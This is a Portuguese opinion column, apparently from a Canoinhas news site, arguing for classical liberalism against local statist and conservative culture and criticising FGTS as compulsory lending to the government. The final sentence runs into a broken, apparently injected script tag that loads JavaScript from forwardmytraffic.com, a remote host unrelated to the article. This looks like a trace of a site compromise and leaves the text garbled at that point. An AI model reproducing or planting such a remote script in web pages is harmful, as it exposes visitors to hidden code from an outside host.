Colunistas Política Principais

Liberalismo Canoinhense

Imagine o quão complicado é ser um liberal em uma terra de conservadores e estadistas como é a nossa região.

 

Ser liberal significa acreditar no progresso da humanidade a partir da livre concorrência das forças sociais e ser contrário às imposições das autoridades sobre a conduta do indivíduo, tanto no campo ideológico como no campo material, devido à desconfiança básica sobre todo o tipo de obrigação.

 

Em outras palavras, defender que cada um seja dono de sua própria vida. E dessa ideia derivam-se os princípios do liberalismo, a liberdade individual, os direitos individuais, a igualdade perante a lei, a proteção à propriedade privada e o livre comércio.

 

Mas ser um advogado da liberdade individual em Canoinhas é uma tarefa difícil, enfrentar décadas de cultura estadista conservadora não é pra qualquer um.

 

Tente explicar à um cidadão médio canoinhense que o FGTS não é um direito do trabalhador, e sim, um empréstimo compulsório que você faz para o governo, que te devolve um juro ridículo por isso, sem contar que o dinheiro é utilizado para financiar grandes empreiteiras em obras super faturadas por aí. Não é nada fácil mesmo.

 

O liberalismo afasta o Estado paternalista, que não poderá atuar interferindo, limitando ou suprindo necessidade na vida de qualquer indivíduo e, sobretudo, não poderá intervir na economia e no mercado. Pois bem, não será do dia para noite que iremos modificar a maneira de pensar de toda uma população, muito embora, acredito eu, que o trabalhador canoinhense seja um liberal por essência, mesmo muitos não compreendendo o cerne do pensamento liberal, estes o praticam de forma involuntária, pois a maioria não esperam o governo fazer algo, tomam a iniciativa e agem.

 

E quando esses trabalhadores canoinhenses começarem a perceber que o governo não é a solução, e sim, parte do problema, talvez tomem a iniciativa e mudem o poder das mãos do governo para as mãos da população…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: